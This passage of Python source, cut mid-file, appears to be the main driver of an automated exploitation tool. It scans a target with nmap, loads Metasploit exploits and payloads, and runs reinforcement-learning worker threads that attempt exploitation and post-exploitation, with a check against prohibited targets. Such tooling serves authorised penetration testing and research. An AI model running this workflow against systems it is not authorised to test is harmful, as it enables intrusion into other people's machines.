np.zeros(593) 2407 | for i in range(len(a_list)): 2408 | a = a_list[i] 2409 | # print(a) 2410 | a_cats[a] = 1 2411 | expert_a.append(a_cats) 2412 | #D = Discriminator() 2413 | # Get command arguments. 2414 | rhost, mode, port, service = command_parse() 2415 | if is_valid_ip(rhost) is False: 2416 | util.print_message(FAIL, 'Invalid IP address: {}'.format(rhost)) 2417 | exit(1) 2418 | if mode not in ['train', 'test']: 2419 | util.print_message(FAIL, 'Invalid mode: {}'.format(mode)) 2420 | exit(1) 2421 | 2422 | # Show initial banner. 2423 | show_banner(util, 0.1) 2424 | 2425 | # Initialization of Metasploit. 2426 | env = Metasploit(rhost) 2427 | if rhost in env.prohibited_list: 2428 | util.print_message(FAIL, 'Target IP={} is prohibited.\n' 2429 | ' Please check "config.ini"'.format(rhost)) 2430 | exit(1) 2431 | nmap_result = 'nmap_result_' + env.rhost + '.xml' 2432 | nmap_command = env.nmap_command + ' ' + nmap_result + ' ' + env.rhost + '\n' 2433 | env.execute_nmap(env.rhost, nmap_command, env.nmap_timeout) 2434 | com_port_list, proto_list, info_list = env.get_port_list(nmap_result, env.rhost) 2435 | com_exploit_list = env.get_exploit_list() 2436 | com_payload_list = env.get_payload_list() 2437 | com_payload_list.append('no payload') 2438 | 2439 | # Create exploit tree. 2440 | exploit_tree = env.get_exploit_tree() 2441 | 2442 | # Create target host information. 2443 | com_indicate_flag = check_port_value(port, service) 2444 | if com_indicate_flag: 2445 | target_tree, com_port_list = env.get_target_info_indicate(rhost, proto_list, info_list, port, service) 2446 | else: 2447 | target_tree = env.get_target_info(rhost, proto_list, info_list) 2448 | 2449 | # Initialization of global option. 2450 | TRAIN_WORKERS = env.train_worker_num 2451 | TEST_WORKER = env.test_worker_num 2452 | MAX_STEPS = env.train_max_steps 2453 | MAX_TRAIN_NUM = env.train_max_num 2454 | Tmax = env.train_tmax 2455 | 2456 | env.client.termination(env.client.console_id) # Disconnect common MSFconsole. 2457 | NUM_ACTIONS = len(com_payload_list) # Set action number. 2458 | NONE_STATE = np.zeros(NUM_STATES) # Initialize state (s). 2459 | 2460 | # Define global variable, start TensorFlow session. 2461 | frames = 0 # All trial number of all threads. 2462 | isFinish = False # Finishing learning/testing flag. 2463 | update_local_weight_count = 0 2464 | post_exploit_count = 0 # Number of successful post-exploitation. 2465 | exploit_count = 0 # Number of successful exploitation. 2466 | plot_count = [0] # Exploitation count list for plot. 2467 | plot_pcount = [0] # Post-exploit count list for plot. 2468 | SESS = tf.Session() # Start TensorFlow session. 2469 | 2470 | with tf.device("/cpu:0"): 2471 | parameter_server = ParameterServer() 2472 | threads = [] 2473 | 2474 | if mode == 'train': 2475 | # Create learning thread. 2476 | for idx in range(TRAIN_WORKERS): 2477 | thread_name = 'local_thread' + str(idx + 1) 2478 | threads.append(Worker_thread(thread_name=thread_name, 2479 | thread_type="learning", 2480 | parameter_server=parameter_server, 2481 | rhost=rhost)) 2482 | else: 2483 | # Create testing thread. 2484 | for idx in range(TEST_WORKER): 2485 | thread_name = 'local_thread1' 2486 | threads.append(Worker_thread(thread_name=thread_name, 2487 | thread_type="test", 2488 | parameter_server=parameter_server, 2489 | rhost=rhost)) 2490 | 2491 | # Define saver. 2492 | saver = tf.train.Saver() 2493 | 2494 | # Execute TensorFlow with multi-thread. 2495 | COORD = tf.train.Coordinator() # Prepare of TensorFlow with multi-thread. 2496 | SESS.run(tf.global_variables_initializer()) # Initialize variable. 2497 | tensorboard_dir = '/home/star/DeepExploit1/logGD' 2498 | writer = tf.summary.FileWriter(tensorboard_dir, SESS.graph) 2499 | running_threads = [] 2500 | if mode == 'train': 2501 | # Load past learned data. 2502 | if os.path.exists(env.save_file) is True: 2503 | # Restore learned model from local file. 2504 | util.print_message(OK, 'Restore learned data.') 2505 | saver.restore(SESS, env.save_file) 2506 | 2507 | # Execute learning. 2508 | for worker in threads: 2509 | job = lambda: worker.run(exploit_tree, target_tree, saver, env.save_file) 2510 | t = threading.Thread(target=job) 2511 | t.start() 2512 | else: 2513 | # Execute testing. 2514 | # Restore learned model from local file. 2515 | util.print_message(OK, 'Restore learned data.') 2516 | saver.restore(SESS, env.save_file) 2517 | for worker in threads: 2518 | job = lambda: worker.run(exploit_tree, target_tree) 2519 | t = threading.Thread(target=job) 2520 | t.start() 2521 | --------------------------------------------------------------------------------